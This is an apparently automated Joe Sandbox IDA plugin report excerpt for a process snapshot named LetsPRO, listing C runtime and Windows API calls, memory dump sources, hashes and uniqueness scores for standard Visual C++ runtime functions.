                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID: `anonymous namespace'
                                        • API String ID: 168861036-3062148218
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6C93BB24), ref: 6C93C261
                                        • _memset.LIBCMT(00000000,00000000,00000024,00000000,00000000,?,?,6C93BB24), ref: 6C93C26D
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6C93BB24), ref: 6C93C284
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6C93BB24), ref: 6C93C2A2
                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C2CA
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 6C93C2D1
                                        • _memset.LIBCMT(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C2ED
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C30D
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6C93BB24), ref: 6C93C358
                                        • _memset.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,6C93BB24), ref: 6C93C369
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,?,?,6C93BB24), ref: 6C93C380
                                        • free.MSVCR100(?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C491
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$Process$AffinityCurrentMaskfree
                                        • String ID: $$$
                                        • API String ID: 3179535153-233714265
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C90072C: GetLastError.KERNEL32(6C8F3238,?,6C90084A,6C998136), ref: 6C900730
                                          • Part of subcall function 6C90072C: __set_flsgetvalue.MSVCR100 ref: 6C90073E
                                          • Part of subcall function 6C90072C: SetLastError.KERNEL32(00000000), ref: 6C900750
                                        • _calloc_crt.MSVCR100(00000086,00000001), ref: 6C97EEDC
                                        • strcpy_s.MSVCR100(?,00000086,00000000,?), ref: 6C97EF02
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97EF17
                                        • _errno.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF6E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF78
                                        • __get_sys_err_msg.LIBCMT ref: 6C97EEFA
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C371
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C37A
                                          • Part of subcall function 6C97C364: __sys_errlist.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C381
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast__sys_nerr$__get_sys_err_msg__invoke_watson__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfostrcpy_s
                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                        • API String ID: 1851745123-798102604
                                        • Opcode ID: e6de565caa316b65bedf7f3251ab40c97a36afca630aed10675d4050c5c12bbe
                                        • Instruction ID: bd0b933c2ee13f135dc00c17f97daab7246596e511392e77c228cd7936aef181
                                        • Opcode Fuzzy Hash: e6de565caa316b65bedf7f3251ab40c97a36afca630aed10675d4050c5c12bbe
                                        • Instruction Fuzzy Hash: E241573260B265AF9B319B659C448EF7F7CEF22768B200569F418A6E51E730C920C3F4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___crtGetStringTypeA.LIBCMT ref: 6C9069F7
                                        • memcmp.MSVCR100(?,000000FE), ref: 6C906AB4
                                        • _getptd.MSVCR100(00000001,00000000), ref: 6C906B09
                                        • __expandlocale.LIBCMT ref: 6C906B31
                                          • Part of subcall function 6C905101: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6C905137
                                          • Part of subcall function 6C905101: strcpy_s.MSVCR100(00000000,00000000,6C9051E0,00000000,00000000,00000005), ref: 6C9051A5
                                        • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6C906B50
                                        • _strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 6C906B66
                                        • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6C906B75
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6C906BC3
                                        • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6C906BEC
                                        • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6C906C26
                                        • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6C906C52
                                        • InterlockedDecrement.KERNEL32(00000000), ref: 6C906C7B
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C930CCC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__expandlocale__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
                                        • String ID:
                                        • API String ID: 986606718-0
                                        • Opcode ID: f99d7bbce83f819edbacdca5ac2d9d1da8309be5d633f9e017484996a5eaaeb8
                                        • Instruction ID: 406d555e3fb891713bd6cf5b82efea6cbceee54381c9a5d158f6f49f33d8af3e
                                        • Opcode Fuzzy Hash: f99d7bbce83f819edbacdca5ac2d9d1da8309be5d633f9e017484996a5eaaeb8
                                        • Instruction Fuzzy Hash: 71A115B1A012199FDB24CF28C891BE9B7B4FF59304F1044AAE91DE7650EB31EA84CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$__fassignisleadbyte
                                        • String ID:
                                        • API String ID: 3459433188-0
                                        • Opcode ID: fb5526daf3ed45fcbca222fd4f01a74cded78434030602d636dc7150fe9006d4
                                        • Instruction ID: 0759caf805b1b16af250ac36806379d2ef1eebe6e7a121d7b61bf66fb8a727fb
                                        • Opcode Fuzzy Hash: fb5526daf3ed45fcbca222fd4f01a74cded78434030602d636dc7150fe9006d4
                                        • Instruction Fuzzy Hash: 22514732209A94DAC3195B3CD8449AD3BA8AF33738730070EE5B48AED1DB34D246C7A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93FCBE
                                        • ??0SchedulerPolicy@Concurrency@@QAE@ABV01@@Z.MSVCR100(?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004,6C940478,6C9A55E0,0000000C,6C9403B2), ref: 6C93FCD7
                                          • Part of subcall function 6C942110: ??2@YAPAXI@Z.MSVCR100(00000024,00000000,?,6C93FCDC,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004), ref: 6C94211A
                                          • Part of subcall function 6C942110: memcpy.MSVCR100(00000000,?,00000024,00000024,00000000,?,6C93FCDC,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000), ref: 6C942129
                                          • Part of subcall function 6C941D71: ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004), ref: 6C941DB5
                                          • Part of subcall function 6C941D71: _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000), ref: 6C941DC5
                                          • Part of subcall function 6C941D71: ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?), ref: 6C941DCC
                                          • Part of subcall function 6C941D71: ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C941DFA
                                          • Part of subcall function 6C941D71: InitializeSListHead.KERNEL32(?), ref: 6C941E0F
                                          • Part of subcall function 6C941D71: InitializeSListHead.KERNEL32(?), ref: 6C941E15
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004,6C940478,6C9A55E0,0000000C), ref: 6C93FD07
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6C93FDA9
                                        • InitializeSListHead.KERNEL32(?), ref: 6C93FDCE
                                        • InitializeSListHead.KERNEL32(?), ref: 6C93FDD7
                                        • InitializeSListHead.KERNEL32(?), ref: 6C93FDE0
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000), ref: 6C93FDE6
                                          • Part of subcall function 6C942161: std::exception::exception.LIBCMT(6C941FF3,?,6C941FF3,00000001), ref: 6C942180
                                          • Part of subcall function 6C942161: _CxxThrowException.MSVCR100(?,6C9A0EAC,6C941FF3), ref: 6C942195
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000004,00000000), ref: 6C93FDF3
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000007,00000004,00000000), ref: 6C93FE01
                                          • Part of subcall function 6C93B79F: __EH_prolog3.LIBCMT ref: 6C93B7A6
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000007,00000004,00000000), ref: 6C93FE15
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000002,00000007,00000004,00000000), ref: 6C93FE32
                                        • TlsAlloc.KERNEL32(00000002,00000002,00000007,00000004,00000000), ref: 6C93FE3D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9454B2), ref: 6C93FE4B
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93FE63
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C93FE71
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Initialize$Concurrency@@Policy@Scheduler$ElementHeadKey@2@@ListValue@$??2@CountCriticalExceptionH_prolog3SectionSpinThrow$AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastV01@@_memsetmemcpystd::exception::exception
                                        • String ID:
                                        • API String ID: 4135718791-0
                                        • Opcode ID: a85360e6507b98137c0087fed32276d7eee6dd7aae91f538cbfc1f762e6a2b3a
                                        • Instruction ID: ae130bdde0185e4835a016e97767d3016cc5e7d11a649f47f45a18559d44f3de
                                        • Opcode Fuzzy Hash: a85360e6507b98137c0087fed32276d7eee6dd7aae91f538cbfc1f762e6a2b3a
                                        • Instruction Fuzzy Hash: E351D5B1A00A56EBCB18DFB5C884BD9FBA5BF18314F50862ED52D97B80C734A564CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wsopen_s.MSVCR100(?,?,00000000,?,00000180,00000000,?,?), ref: 6C90BDE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _wsopen_s
                                        • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                        • API String ID: 2316899696-3573488595
                                        • Opcode ID: ae7bdc205c681d9b655063cfaa18fab804b13840ee0f3bc25eea2d797a1e3c9e
                                        • Instruction ID: 835d3b851f986c71927f90d6487f39654e86c22310cf9f007562cbaaaa2494d9
                                        • Opcode Fuzzy Hash: ae7bdc205c681d9b655063cfaa18fab804b13840ee0f3bc25eea2d797a1e3c9e
                                        • Instruction Fuzzy Hash: 81714AB2F59309DADB105F6988457A9B7B8FF12308F15416DDD5497E80E3B4CA80CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,00000000), ref: 6C9538A1
                                        • _invalid_parameter_noinfo.MSVCR100(?,00000000), ref: 6C9538AC
                                        • __fassign.LIBCMT(ccs,?,00000003,?,?,00000000), ref: 6C953A1E
                                        • __fassign.LIBCMT(?,UTF-8,00000005,?,?,00000000), ref: 6C953A48
                                        • __fassign.LIBCMT(?,UTF-16LE,00000008,?,?,?,?,?,00000000), ref: 6C953A67
                                        • __fassign.LIBCMT(?,UNICODE,00000007,?,?,?,?,?,?,?,?,00000000), ref: 6C953A86
                                        • _errno.MSVCR100(?,?,00000000), ref: 6C953AA8
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000000), ref: 6C953AB3
                                        • __wsopen_s.LIBCMT(?,?,00000109,?,00000180,?,?,00000000), ref: 6C953ACA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __fassign$_errno_invalid_parameter_noinfo$__wsopen_s
                                        • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                        • API String ID: 4135599424-3573488595
                                        • Opcode ID: be6a2526e5901396b4f402d3bbf74fc3187862875cb47848eb353219b0a4fe40
                                        • Instruction ID: 03f5c4fe067a75d2b1f8a1c43d1ee0b2f87f84b3f7f4894bd2e3aad32dd981c6
                                        • Opcode Fuzzy Hash: be6a2526e5901396b4f402d3bbf74fc3187862875cb47848eb353219b0a4fe40
                                        • Instruction Fuzzy Hash: EB616AF5D09345EEEB02CF7A8455799BFB8BB02308FA44269D95593D82D3B4C2B5CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C9740C3
                                        • _getptd.MSVCR100(00000004,6C974A47,?,?,E06D7363,1FFFFFFF,19930522), ref: 6C9740C8
                                        • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6C9740D6
                                          • Part of subcall function 6C973954: DecodePointer.KERNEL32(6C973990,00000008,6C9744B7,6C9744D8,0000000C,6C97452F,?,?,00000003,00000000,6C974588,00000008,6C92CB7F,?,00000000,00000003), ref: 6C973966
                                          • Part of subcall function 6C973954: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6C973986
                                        • ?unexpected@@YAXXZ.MSVCR100 ref: 6C9740DF
                                        • ?terminate@@YAXXZ.MSVCR100 ref: 6C9740EA
                                        • _getptd.MSVCR100 ref: 6C9740EF
                                        • _CxxThrowException.MSVCR100(00000000,00000000), ref: 6C974101
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974115
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974120
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C97414B
                                        • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6C974169
                                        • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6C97416F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ?_inconsistency@@$?terminate@@_getptd$?raw_name@type_info@@?unexpected@@DecodeExceptionH_prolog3_catchPointerThrowstrcmp
                                        • String ID: csm
                                        • API String ID: 2156745037-1018135373
                                        • Opcode ID: bfeff9f72e9229ae94bde2a8e0c8ef366c40d302cd8aa1b6332df6f0f4ea8f64
                                        • Instruction ID: 187ca03a73394d8b19a128d3db9589829ea17617c4252b2b31c4d96e01324003
                                        • Opcode Fuzzy Hash: bfeff9f72e9229ae94bde2a8e0c8ef366c40d302cd8aa1b6332df6f0f4ea8f64
                                        • Instruction Fuzzy Hash: 84212935502210DBCB30EFB8C840BD9B3ACAF30329F254418D9688BF42C730EA499EB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C90A404
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F3C
                                        • ___free_lconv_mon.LIBCMT ref: 6C916F47
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F5D
                                        • ___free_lconv_num.LIBCMT ref: 6C916F68
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F75
                                        • free.MSVCR100(?,?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F80
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$___free_lconv_mon___free_lconv_num
                                        • String ID:
                                        • API String ID: 2838340673-0
                                        • Opcode ID: 5adbdcf89ae0ecfe415bed28986425780516a396bf90d9cd914a4582f636c5a5
                                        • Instruction ID: dfb8ea0f64d4a182969ad964209bcca1bdcd8c4ee6185fac6f2e3447a7d8a9cb
                                        • Opcode Fuzzy Hash: 5adbdcf89ae0ecfe415bed28986425780516a396bf90d9cd914a4582f636c5a5
                                        • Instruction Fuzzy Hash: 0131A072609345DFD7215FA9DC80A8A77FAEB10318F20196EE15A87E50DF30E9C4CA51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$__cftof
                                        • String ID:
                                        • API String ID: 813615167-0
                                        • Opcode ID: 22484d37a2986a484b6218e65a98760f4a5793a3ab41a815a898fad9ecfe610b
                                        • Instruction ID: 0ac06d1b4e457e9a50a426a5bb657569b1368fa697c178268359b14afeb35a6c
                                        • Opcode Fuzzy Hash: 22484d37a2986a484b6218e65a98760f4a5793a3ab41a815a898fad9ecfe610b
                                        • Instruction Fuzzy Hash: 184137322096589AC3044F38ED429EE37A8BF23368330069DE5749BED0DF31D656CAD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __aligned_offset_malloc.LIBCMT(?,?,?), ref: 6C9768E1
                                          • Part of subcall function 6C9767B4: _errno.MSVCR100 ref: 6C9767C4
                                          • Part of subcall function 6C9767B4: _invalid_parameter_noinfo.MSVCR100 ref: 6C9767CF
                                        • __aligned_free.LIBCMT(?), ref: 6C9768F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aligned_free__aligned_offset_malloc_errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2665303786-0
                                        • Opcode ID: c3203d8506c5f9095ed7d25bf43c2bf2026a80044cc667457f7c84c89af0cf1a
                                        • Instruction ID: 8d4a6f3ec26b7078c3cc2831af9435c77002c1302bc1272a20dbf1fbfe31761b
                                        • Opcode Fuzzy Hash: c3203d8506c5f9095ed7d25bf43c2bf2026a80044cc667457f7c84c89af0cf1a
                                        • Instruction Fuzzy Hash: 05519172A0520ADFCF14CF68D8806EEBBB5FF54358B148569E815E7744EB31DA44CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __set_flsgetvalue.MSVCR100(6C901E10,00000008,6C901E46,00000001,?), ref: 6C901D9A
                                          • Part of subcall function 6C900371: TlsGetValue.KERNEL32(?,6C900743), ref: 6C90037A
                                        • TlsGetValue.KERNEL32(6C901E10,00000008,6C901E46,00000001,?), ref: 6C901DAB
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C901DBE
                                        • DecodePointer.KERNEL32(00000000), ref: 6C901DDC
                                        • _initptd.MSVCR100(00000000,00000000), ref: 6C901DEE
                                          • Part of subcall function 6C901ECB: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C901F68,00000008,6C927629,00000000,00000000), ref: 6C901EDC
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000D), ref: 6C901F10
                                          • Part of subcall function 6C901ECB: InterlockedIncrement.KERNEL32(?), ref: 6C901F1D
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000C), ref: 6C901F31
                                        • GetCurrentThreadId.KERNEL32 ref: 6C901DF5
                                        • __freeptd.LIBCMT ref: 6C9029A1
                                        • __heap_init.LIBCMT ref: 6C90B901
                                        • GetCommandLineA.KERNEL32(6C901E10,00000008,6C901E46,00000001,?), ref: 6C90B932
                                        • GetCommandLineW.KERNEL32 ref: 6C90B93D
                                        • __ioterm.LIBCMT ref: 6C917BBE
                                        • free.MSVCR100(00000000), ref: 6C9274C5
                                        Similarity
                                        • API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
                                        • String ID:
                                        • API String ID: 2121586863-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: NameName::Name::operator=
                                        • String ID: class $coclass $cointerface $enum $struct $union $unknown ecsu'
                                        • API String ID: 1765408024-3025788322
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??2@YAPAXI@Z.MSVCR100(00000008,F3B6147F,?,?), ref: 6C9401CF
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(F3B6147F,?,?), ref: 6C94020A
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,F3B6147F,?,?), ref: 6C940223
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,F3B6147F,?,?), ref: 6C94023E
                                        • _memset.LIBCMT(?,00000000,?,F3B6147F,?,?), ref: 6C940252
